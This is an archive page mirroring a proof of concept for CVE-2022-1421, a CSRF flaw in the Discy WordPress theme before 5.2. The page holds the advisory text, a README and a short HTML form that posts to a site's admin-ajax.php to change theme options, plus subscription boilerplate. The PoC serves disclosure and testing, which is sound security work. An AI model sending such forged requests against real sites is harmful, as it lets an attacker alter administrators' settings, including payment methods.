Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1421 PoC — Discy < 5.2 - Settings Update via CSRF

Source
Associated Vulnerability
Title:Discy < 5.2 - Settings Update via CSRF (CVE-2022-1421)
Description:The Discy WordPress theme before 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary 's settings including payment methods via a CSRF attack
Readme
# CVE-2022-1421
A Proof-Of-Concept for CVE-2022-1421
## Discy < 5.2 - Settings Update via CSRF
Discy < 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary plugin's settings including payment methods via a CSRF attack.

# Affected Theme
[Discy](https://themeforest.net/item/discy-social-questions-and-answers-wordpress-theme/19281265) < 5.2

# POC
```
<html>
  <body>
    <form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html> 
```

# References
https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421
File Snapshot

[4.0K] /data/pocs/9d7854619f2c0f7731076d54bf00a1924c196ee2 ├── [ 350] CVE-2022-1421_POC.html └── [ 907] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →